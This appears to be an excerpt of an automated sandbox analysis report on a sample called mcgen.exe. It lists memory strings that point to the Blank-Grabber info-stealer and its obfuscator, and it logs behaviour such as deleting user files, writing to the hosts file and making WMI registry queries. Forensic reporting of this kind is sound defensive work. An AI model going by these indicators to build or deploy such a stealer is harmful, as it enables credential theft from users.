              Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberr%
              Source: mcgen.exe, 00000002.00000003.2141215194.000002C54E544000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141280014.000002C54E521000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2140715336.000002C54E583000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2140947833.000002C54EBE0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141430894.000002C54E540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: mcgen.exe, 00000002.00000002.2525383234.000002C54E014000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E1F3000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2144496528.000002C54E8F5000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2144379299.000002C54E955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
              Source: mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
              Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: mcgen.exe, 00000002.00000002.2528733144.000002C54ED10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
              Source: powershell.exe, 0000003E.00000002.2321464313.000001FC3E755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: mcgen.exe, 00000002.00000003.2248894895.000002C54EACA000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527984225.000002C54EACA000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2272402532.000002C54EAC8000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2407347267.000002C54EACA000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: mcgen.exe, 00000002.00000003.2407347267.000002C54EACA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: mcgen.exe, 00000002.00000002.2526365039.000002C54E3FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: mcgen.exe, 00000002.00000002.2531400042.000002C54FF08000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: mcgen.exe, 00000002.00000002.2531400042.000002C54FF08000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 0000000B.00000002.2277416389.0000020A53250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2321464313.000001FC3F48A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2390633772.000001FC4DB97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: mcgen.exe, 00000002.00000002.2528839901.000002C54EE30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
              Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
              Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
              Source: mcgen.exe, 00000002.00000002.2528733144.000002C54ED10000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: mcgen.exe, 00000002.00000002.2526365039.000002C54E3FE000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2127861413.000002C54E191000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://peps.python.org/pep-0205/
              Source: mcgen.exe, 00000002.00000002.2535253168.00007FFD94659000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
              Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: mcgen.exe, 00000002.00000003.2263911677.000002C54EA70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: mcgen.exe, 00000002.00000003.2260291841.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2242671922.000002C54EB80000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2256093208.000002C54EB80000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2248894895.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2259875659.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2256093208.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: mcgen.exe, 00000002.00000003.2248894895.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2259875659.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
              Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2248894895.000002C54EACA000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527984225.000002C54EACA000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2272402532.000002C54EAC8000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2407347267.000002C54EACA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: mcgen.exe, 00000002.00000002.2528839901.000002C54EE30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: mcgen.exe, 00000002.00000002.2528839901.000002C54EE30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F088000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F088000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
              Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: mcgen.exe, 00000002.00000003.2260177026.000002C54F5E2000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2529086772.000002C54F144000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2529086772.000002C54F088000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2241432619.000002C54F5E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: mcgen.exe, 00000002.00000003.2263911677.000002C54EA70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org#
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F148000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/
              Source: mcgen.exe, 00000002.00000003.2260291841.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2272402532.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2256093208.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2279071869.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: mcgen.exe, 00000002.00000003.2248894895.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2259875659.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: mcgen.exe, 00000002.00000003.2242671922.000002C54EB80000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2256093208.000002C54EB80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: mcgen.exe, 00000002.00000003.2248894895.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2259875659.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: mcgen.exe, 00000002.00000003.2248894895.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2259875659.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: mcgen.exe, 00000002.00000002.2529691866.000002C54F58F000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2529086772.000002C54F148000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmp, mcgen.exe, 00000002.00000002.2534814877.00007FFD9409A000.00000004.00000001.01000000.0000000F.sdmp, libcrypto-3.dll.0.drString found in binary or memory: https://www.openssl.org/H
              Source: mcgen.exe, 00000002.00000002.2535253168.00007FFD94659000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/)
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
              Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\user\Desktop\mcgen.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\QNCYCDFIJJ.xlsxJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\QNCYCDFIJJ.pdfJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\LSBIHQFDVT.docxJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\EFOYFBOLXA.pngJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\EFOYFBOLXA.pngJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: conhost.exeProcess created: 42
              Source: cmd.exeProcess created: 70

              System Summary

              barindex
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695CED2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,103_2_00007FF695CED2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exeCode function: 103_2_00007FF695D1B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,103_2_00007FF695D1B57C
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F18BD00_2_00007FF6B9F18BD0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F309380_2_00007FF6B9F30938
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F369D40_2_00007FF6B9F369D4
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F110000_2_00007FF6B9F11000
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F1A34B0_2_00007FF6B9F1A34B
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F21BC00_2_00007FF6B9F21BC0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F35C700_2_00007FF6B9F35C70
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F33C800_2_00007FF6B9F33C80
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F22C800_2_00007FF6B9F22C80
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F364880_2_00007FF6B9F36488
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F309380_2_00007FF6B9F30938
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F1A4E40_2_00007FF6B9F1A4E4
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F1AD1D0_2_00007FF6B9F1AD1D
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F281540_2_00007FF6B9F28154
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F219B40_2_00007FF6B9F219B4
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F221D40_2_00007FF6B9F221D4
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F23A140_2_00007FF6B9F23A14
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F2DACC0_2_00007FF6B9F2DACC
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F2DF600_2_00007FF6B9F2DF60
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F397980_2_00007FF6B9F39798
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F217B00_2_00007FF6B9F217B0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F21FD00_2_00007FF6B9F21FD0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F288040_2_00007FF6B9F28804
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F198700_2_00007FF6B9F19870
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F318E40_2_00007FF6B9F318E4
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F3411C0_2_00007FF6B9F3411C
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F25DA00_2_00007FF6B9F25DA0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F21DC40_2_00007FF6B9F21DC4
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F2E5E00_2_00007FF6B9F2E5E0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F236100_2_00007FF6B9F23610
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F35EEC0_2_00007FF6B9F35EEC
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 0_2_00007FF6B9F29F100_2_00007FF6B9F29F10
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FF6B9F369D42_2_00007FF6B9F369D4
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD940E92C02_2_00007FFD940E92C0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD940F22E02_2_00007FFD940F22E0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD940E9D102_2_00007FFD940E9D10
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD94154CF02_2_00007FFD94154CF0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD9414CFB02_2_00007FFD9414CFB0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD941755102_2_00007FFD94175510
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD940D94E02_2_00007FFD940D94E0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD940D45702_2_00007FFD940D4570
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD9411A5A02_2_00007FFD9411A5A0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD9412B6402_2_00007FFD9412B640
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD941016302_2_00007FFD94101630
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD940F46302_2_00007FFD940F4630
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD940FE6502_2_00007FFD940FE650
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD940E36602_2_00007FFD940E3660
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD9412E7002_2_00007FFD9412E700
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD941307502_2_00007FFD94130750
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD948A5DD02_2_00007FFD948A5DD0
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFDA334155A2_2_00007FFDA334155A
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFDA3407A202_2_00007FFDA3407A20
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFDA33415962_2_00007FFDA3341596
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFDA33416182_2_00007FFDA3341618
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFDA33413DE2_2_00007FFDA33413DE
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFDA33416542_2_00007FFDA3341654
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFDA334116D2_2_00007FFDA334116D
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFDA33660302_2_00007FFDA3366030
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFDA334117C2_2_00007FFDA334117C
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFDA33415462_2_00007FFDA3341546
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFDA33416FE2_2_00007FFDA33416FE
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFDA334149C2_2_00007FFDA334149C
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD32CF86FA11_2_00007FFD32CF86FA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD32CF9FFB11_2_00007FFD32CF9FFB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD32CF895511_2_00007FFD32CF8955
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD32CF84FA11_2_00007FFD32CF84FA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD32CF5CFA11_2_00007FFD32CF5CFA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD32CFB9FA11_2_00007FFD32CFB9FA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD32DC302711_2_00007FFD32DC3027
